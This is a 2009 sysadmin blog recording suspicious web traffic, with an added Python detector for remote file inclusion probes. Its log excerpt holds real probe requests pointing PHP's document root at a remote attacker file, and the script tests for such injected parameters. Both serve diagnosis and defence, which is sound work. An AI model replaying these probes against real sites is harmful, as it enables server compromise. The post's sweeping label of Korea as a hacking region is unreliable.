Monday, October 19, 2009

Bad Traffic - Monitoring our sites

Traffic from these two networks has been monitoring one of our sites, possibly scraping content.

Rackspace.com, Ltd. RSCP-NET-4 (NET-174-143-0-0-1)
174.143.0.0 - 174.143.255.255
Slicehost RSPC-1251808572434376 (NET-174-143-180-0-1)
174.143.180.0 - 174.143.183.255

Object Software Development SEANET-CBLK (NET-199-181-164-0-1)
199.181.164.0 - 199.181.168.255
Seanet Corporation SEANET01-NET01 (NET-199-181-165-0-1)
199.181.165.0 - 199.181.167.255

Monday, October 12, 2009

Bad Traffic from Korea

Not sure what this nonsense is and how it is even getting directed to our server. The web addresses below are not even on our server but somehow this showed up in our logs and is generating errors:

222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal/PayPal.html///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -

This is coming from a common spamming/hacking part of the world - Korea:

inetnum: 222.231.0.0 - 222.231.63.255
netname: KIDC
descr: Korea Internet Data Center
descr: KIDC Bldg, 261-1, Nonhyun-dong, Kangnam-ku, Seoul, 135-010
country: KR
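
The requests logged above set a query parameter named `_SERVER[DOCUMENT_ROOT]` (percent-encoded) to a remote URL, which is the shape of a remote file inclusion probe against PHP applications. The following Python script is an added example, not part of the original post: it flags such requests in an access log and counts, per client, how many did not end in a 404. The function names, the sample log lines, the documentation-range IP addresses and the `example.test` host are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client, method, request target and status of an access-log entry.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "([A-Z]+) (\S+)[^"]*" (\d{3})')
# PHP superglobal names; a request parameter should never carry one of these.
SUPERGLOBAL_RE = re.compile(
    r'^(_(SERVER|GET|POST|COOKIE|FILES|ENV|REQUEST|SESSION)|GLOBALS)(\[|$)')
# Parameter values that are absolute remote URLs (heuristic: a legitimate
# redirect parameter can match too, so treat it as a triage signal).
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.I)

def classify(line):
    """Return (client, status, reasons) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _method, target, status = m.groups()
    reasons = []
    # parse_qsl percent-decodes names and values, so %5B/%5D become [ and ].
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if SUPERGLOBAL_RE.match(name):
            reasons.append("superglobal-override:" + name)
        if REMOTE_URL_RE.match(value):
            reasons.append("remote-url-value:" + name)
    return (client, int(status), reasons) if reasons else None

def summarize(lines):
    """Group flagged requests per client; count those that did not 404."""
    report = {}
    for line in lines:
        hit = classify(line)
        if hit:
            client, status, reasons = hit
            entry = report.setdefault(
                client, {"hits": 0, "non_404": 0, "reasons": set()})
            entry["hits"] += 1
            entry["non_404"] += status != 404  # reached a real resource
            entry["reasons"].update(r.split(":")[0] for r in reasons)
    return report

# Constructed sample lines in the same log format as the excerpt above.
SAMPLE = [
    '192.0.2.10 - - [04/10/2009:10:33:45 -0800] "GET /web///?_SERVER%5BDOCUMENT_ROOT%5D=http://files.example.test/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -',
    '192.0.2.10 - - [04/10/2009:10:33:46 -0800] "GET /index.php?_SERVER%5BDOCUMENT_ROOT%5D=http://files.example.test/id1.txt??? HTTP/1.1" 200 4096 "-" "Mozilla/5.0" -',
    '198.51.100.7 - - [04/10/2009:10:40:02 -0800] "GET /web/e-commerce/paypal/PayPal.html?page=2 HTTP/1.1" 200 7310 "-" "Mozilla/5.0" -',
]

if __name__ == "__main__":
    for client, info in summarize(SAMPLE).items():
        print(client, info)
```

A flagged request that returned 404 never reached a script; one with any other status hit a real resource and is the entry to review first.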

Saturday, October 10, 2009

Strange Traffic in Logs - a bunch from Canada

There is something bizarre going on in our logs. It is interesting that the first of such links comes from aQuantive - now Microsoft advertising.

We have a site that is running some Google advertising supposedly (did not set this up myself). There is a bunch of traffic - all from different networks in Canada - where these visitors hit that ad landing page, then jump over to another web site on our server.

For this particular company, it is highly unlikely that 10 or 20 visitors per day in Canada are clicking on their ads legitimately (if that is in fact the source).

Additionally there are strange Google redirect links in our logs, and a lot of searches in Google.ca (Google Canada) that are ending up at this site.

One thing I noticed is that initial attempts at this type of traffic were coming from international locations other than Canada, some of which we have blocked. Perhaps because they cannot get to the site via these locations they set up shop in Canada and attempt to access our site through some weird redirect through a form. Will have to keep looking into that.

The traffic started on September 1st 2009. Here are the IP addresses involved:
